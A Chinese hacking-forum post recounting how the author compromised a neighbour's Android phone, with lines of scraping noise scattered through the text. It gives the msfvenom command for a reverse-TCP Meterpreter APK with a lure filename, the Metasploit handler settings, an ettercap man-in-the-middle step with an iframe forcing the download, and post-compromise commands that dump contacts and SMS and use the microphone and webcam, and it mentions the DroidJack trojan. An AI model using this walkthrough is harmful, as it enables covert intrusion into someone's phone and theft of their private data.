找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1822|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ u1 K" @, q: _" ~ 五、msf+ettercap入侵邻居安卓手机 : N# `! S* U6 s* C* X6 o& `, y

0 t, k6 [$ a! r4 `

N5 C) z/ ]4 t2 L) q2 B. } 首先启动msf * U& C/ ?" _! L8 r4 H" e

% [8 X: ?/ C5 S* U. I. v

; y) z q$ P9 y2 `/ t 先用kali生成一个安卓木马,如下命令: + J* p d4 C4 x$ ^% d7 x

( k% r. u g0 v% [- `9 Y& |

q- n3 _ h5 L) Z% D Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 2 f( W& ?; `7 F: N. Y, r

/ @# M1 @. \% d! ^" y; x) G+ P

: Y( S% C5 Q: g" p0 G 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 - i9 g) V* ~/ w m" S

" N0 l; c/ k# T6 U$ t- {6 W# t' O

" y' p# u2 O, m1 P/ e 然后进入msf ) p V" u. T/ Y$ r

* M/ U, s7 \* }3 F' S

/ k# l2 q7 c* i8 n5 i5 f6 \/ ] use exploit/multi/handler " a7 C8 \7 g4 s8 Z4 J

" G$ W+ i/ _8 A7 J( Z) `

d3 s. J. e, ^5 w" G) T set payload android/meterpreter/reverse_tcp |& d: n4 p6 @/ m$ i

9 \$ k8 c4 J6 B3 r/ h- \

" Z% d+ K! r6 b" k l set LHOST 192.168.0.109 //ipkailiip 8 e: L8 Q" @* I0 }0 g& R

. r z; h& c* A7 m# N( q

/ O: [" a! m T6 O2 W2 | set LPORT 44444 //端口一定要与前面生成的木马的端口一致 3 K) u& B6 _) i6 v+ `+ ?- |" ?

, q3 b f; C$ r- E, W. m

8 g. F4 v/ h( y3 k' j! b Exploit : L+ z3 o4 a0 Q/ a

2 m. Y c5 X# s' G G1 s

( m- w8 s$ n" ?1 M; I) S   & }$ N4 b2 n; o- H" }8 n5 ^: _

) {: M( q8 ^0 f" E( l

4 { d3 N$ m5 |: N8 M* u: T# I( ?- Y$ p 下面我们开启ettercap -G 0 r/ b% j: U9 {7 b% Y6 R- p% e% Y7 ^; D

1 u+ A! U& C" n/ h a

+ k$ z* ? m' i- i/ z5 r* _1 n3 ? 我物理IP ) o# N* a! F/ e1 L

( P1 C7 i' P; w4 w" \

; n4 X3 ^) r; V7 P* O' I$ y* a   " ?( ?1 N& Z f

8 v" ]2 ^* L: t5 R9 V

2 u1 t5 @) T- n _$ w p2 ~ 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, : }$ i+ d i. s" H' H& Q# A2 O# ?( g

. E' _+ N, G- P/ q: u- }

$ y0 d2 |8 X% e5 h. u; u. {+ P 下面我们来设置一下 . {. j$ \0 i. }! \: ~' }# f

( x; I1 N5 |/ H

& m- [5 V7 `- |- h   ; L8 m l4 w$ M+ ] ]

1 J! `! j6 P; q

6 ^. r; }: n- g, }7 q0 j 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, : E; _3 R, Y7 i. z

& n6 _* h$ u% W( k

% m) A" d2 f' N* o   # I. D( B% |' D: `- ]/ ^* u

* J* t( I2 d6 j. X( q& ~

0 H5 V- G/ R; N8 X: z, K   5 `) W/ K8 k( y

, }2 y- n& d% [# m0 y5 E0 e

# d1 S0 @5 ~. d" e' `; A- _+ T   $ [- c S) U3 ]1 s$ D4 s

, ]8 a7 C- d, b6 l& ~

# [6 x- H/ c% V* d! h" D   k! ^) k8 _* [$ A' [$ v. j1 L& O

7 B6 w! c; L0 B4 F. M# t3 S

9 L1 D, ]6 T# j& b   9 ]' w; L. l8 G- n: b( d3 P( x& o

' C+ A! ?# ^4 M; N

9 @: Y9 X. {, d; s4 N J% H2 k: h0 o. F   - K' k( g; O5 _6 }3 o. }+ v$ M

: K$ R* s; R6 y' H

0 D% {1 ^ b/ w0 a5 Q   ) H6 T7 X1 |! U- d% R; C. ?6 ^

- ^" L R* ?2 W' D( |' m

6 l1 y3 X# Y. ~- D7 k   8 D' W- N9 v6 A' [

2 {7 E! Q$ Q, @$ w2 y- p( z2 j# p' i

% u i/ l$ s0 r- b   ; z( P) C- D4 F9 B1 m/ z

E1 s8 ^, m! h, g& j

' Y6 O$ W/ J6 p U. a Q# W% g# a* S8 T" {   ' m& s6 C, |; G. T% W; G' m- U

9 O/ b8 P1 ^# S% X" y

' a: D$ W# }8 v5 J2 v( [; y2 K3 f   6 {& [6 ?4 Q9 H. X

7 ^2 n/ l; P0 w

/ j# T& b6 L1 k- f {- p6 r   ) G% Y6 p2 F% Z7 E9 I

/ b0 r- v; f9 P D

" u/ j9 o/ C0 S! g/ ^   $ Y' A7 x3 ^# v; h& f+ [" R

. ~5 T3 G* a$ s5 v! Z4 C

/ k. d9 Q% Q$ `7 ^# K0 ~ 下面我们开始攻击 : Q6 Z+ b A m

% ?- W4 S2 j! H% A6 H; u0 o

9 p" v% C3 {+ e( e8 Y4 a   5 Z& y$ C1 [2 k: w7 ~6 m! |2 q5 O

# r( T. E3 e* c: F* W

! F% }3 D3 R- H! j- K) ]1 K   # S& E/ ]$ X$ j0 t4 A/ G n

5 a p! }4 @% v3 I" _4 R! ^: v

* m- A/ d7 W) Z& E( d, y! s- S+ W   ) C3 j& n& f/ x. ]' y9 k' O! j

' ]7 j! x0 S9 g$ P& i

( D) L; b8 j* s% K   / @; t, U8 i% ?$ l

9 Q* D6 {* `0 Z

8 x w. v& z, O* U. \. ?- L. W   |; ~5 H8 z5 ^

6 I7 R9 q: ]+ |. ]

3 U9 ^5 i0 a) z, q" ^5 G! ? 大概过了5分钟多,发现反弹成功了 $ ]. V- J3 y- p2 l. O9 I

+ i) M+ e; \! w+ x

9 U y! h+ ^7 Q- |   9 i* T! |+ E$ l: Z

( T" x- N) Q- Q5 O; ?

m- s6 ^2 a( I* `- _! Z3 Q; J$ u: S   , x. o; f! Z7 R/ j! i

" y2 L! o5 V5 `

* |5 v8 s# D& b# x- Z* Q   / m8 v K# I) M7 F4 f3 }

% c; f1 }0 I' O$ s+ {# ^

* n1 n' E" C6 ^. f! A   8 q6 [5 O4 R* T# G! v5 b

$ ^- O. V. c: p

& i2 g7 P0 ~6 K5 G   . y) n6 p4 z; `5 A) h4 {- o0 x4 E

& D( G* |5 h7 w3 f' v. L3 g8 Z' q

" A6 N T4 e- G: r/ U: t   % [0 ~! O3 R% i# q8 _

) U2 C! k. E8 U' N U* U3 c$ Y

" a: E: h& ?0 t* ]3 _2 ?   3 C5 L! W/ h7 L8 X" D

4 Z/ M: q' f' |7 k8 {$ R7 J% X$ s

5 |: E) k! y- @: U6 c: e" e: o 执行命令 ) i% c, M& m0 o+ q8 @" s

" E" Y' N% J! B F4 d2 ]! s9 t. K/ h

) @" p5 L2 N; P) D8 L } b, a   8 L& V0 Z+ w0 z$ G: ?2 U

. }3 t# U6 z8 p8 ]% n

3 w+ H+ _* e1 X. T- v- X% W dump_contacts    --》这个是导出电话 & L* b0 H# @, e X2 ?, h

2 L( H' e8 a, q: J# I, M, L# _. C

2 g/ r( ~6 p' C dump_sms --》这个是导出信息 ( ~3 i$ {5 t) L! q$ u j

! f# k( W! [: L7 @+ D! T

: h3 J A! ?( X. `4 k record_mic     Record audio from the default microphone for X seconds ! U; o7 A0 m% p- h7 B8 d

n, Q3 w4 ~ w, L

, `9 }3 M) G; F8 b6 v8 I: W     webcam_chat    Start a video chat k5 Z# ]( o6 i' `$ _

2 n& r0 c, M% m

$ l# J: S4 B8 Y8 f; O$ J     webcam_list    List webcams + \. e3 _6 p, n5 |$ v+ {

- w0 I2 ?& Q# `

' t @' {+ O: a5 F3 b7 j! G     webcam_snap    Take a snapshot from the specified webcam + X+ V4 T) b1 e8 W6 d, ^' u

5 B8 |: w7 R% u8 F2 m6 b

+ x3 ~( a$ e1 X9 P# |+ d webcam_stream  lay a video stream from the specified webcam - s& [3 ]# [+ H s8 K$ z) O0 S

& P2 ]/ d t" d) _& O( U

' I8 y* X/ Y: r) l; z% e4 M   ( O4 R" ]# c' Z6 [. S

0 F- |/ }* @ j& J

6 a6 h( x3 B& n   2 R' @# _* r$ n, A2 L2 `

3 _0 U- x0 Y6 D1 ?5 O

7 {# T# `, z2 T5 n/ I 我们打开看一下电话薄, 1 U: S& x% M7 e' e

9 k2 ^; W- ~( R0 y* r

8 X* b& d, l. l/ ^, X7 K   + |, S7 O* W, _0 M6 X3 J

+ y* O" u6 C$ C* G, _

# G4 q* Z/ \/ C/ `& e   # W$ E6 \. s1 ]5 B I4 O

% A8 d, m& k% x/ t" P

# H# L) o4 i5 \ u   1 W* A. l, Y' D' y( R- ~ R

0 h3 d" P+ a* e* w5 J

C% I1 r$ O9 Z5 ~4 n/ n   ) [" K8 |5 `! z% u! l

' U: t$ J4 \8 }- e$ z% c1 Y6 Q

5 H+ L' t% t! d( i0 y+ c' f   F* P2 P2 X" b0 D" a# L; b; s

7 z6 a8 Z* x" ^

9 H. I t! F! |   0 k \/ Y# E. I; w4 D: c

4 }& c% R# g# f0 u6 O6 Z

3 g# @3 T' H( z8 b! R8 S 我们同时欺骗成DroidJack木马,使用方法如图: 8 ~7 x/ ]) ?" Y

0 |. S/ B' O" g; t

9 D' j/ M2 _$ v c& f7 z   # ~ D: v" \) g! ^9 v4 J

# u! A! \" `- Z/ z. l0 G( A4 C( v' R

* t" R, h- b( Z+ r9 h4 W   9 K) T8 H% o" H6 j; s o) N

- f4 f7 o. J5 K0 ~% e1 a

* q: K$ r V/ u; e; o0 B# ^ W- j% W( n   2 Q( _ e s8 L( S- x7 T

- U' G9 E) t% i; m; S6 T2 z

# c1 A6 c- |/ ^8 g: l 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 2 A- r( K8 A9 Q9 D! f3 o

8 E1 [% n) n2 y3 Z- Q& Z

5 q6 i4 f7 N0 C5 M   5 H$ U. c" X+ O

# _& a& F$ O3 ?' O0 O8 ^

, A3 @4 i& V. ^   : P: h0 ]+ o1 D) q5 P

: W' a0 k+ _8 g9 k) V+ G/ l" U

- h4 K: }4 n2 a1 S# }& c7 D' H   0 R% n' _2 U8 r: a

2 T/ _$ Y: D+ n2 L$ X7 F

* F/ m" u$ P) e2 s; o n: X8 z# P0 z1 ]

2 H- h! _! C6 ^7 M

& f- u5 p( t! @
4 w6 V3 s- A+ ?! l: X) O

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表